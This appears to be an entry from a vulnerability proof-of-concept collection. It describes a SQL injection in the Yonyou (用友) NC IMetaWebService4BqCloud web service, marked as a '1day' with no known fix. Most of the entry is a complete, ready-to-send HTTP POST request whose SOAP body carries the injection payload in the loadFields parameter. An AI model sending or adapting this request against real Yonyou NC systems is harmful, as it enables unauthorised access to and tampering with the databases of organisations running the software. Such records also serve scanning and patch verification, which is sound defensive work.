vendor = "用友"
name = "用友 NC IMetaWebService4BqCloud 数据源 SQL 注入"
type = "SQL注入"
version = "未知"
path = "/uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud"
detail = "POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=09133CFE3A7B0CE8341AB1A7DEDFCCDE.serverConnection: keep-aliveSOAPAction: urn:loadFieldsContent-Type: text/xml;charset=UTF-8Host: Content-Length: 350<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:imet=\"http://meta.ae.pubitf.uap/IMetaWebService4BqCloud\"> <soapenv:Header/> <soapenv:Body> <imet:loadFields> <!--type: string--> <imet:string>SmartModel^1';*</imet:string> </imet:loadFields> </soapenv:Body></soapenv:Envelope>"
fix = "未知"
date = "0714"
label = "1day"
verifier = "AdySec"
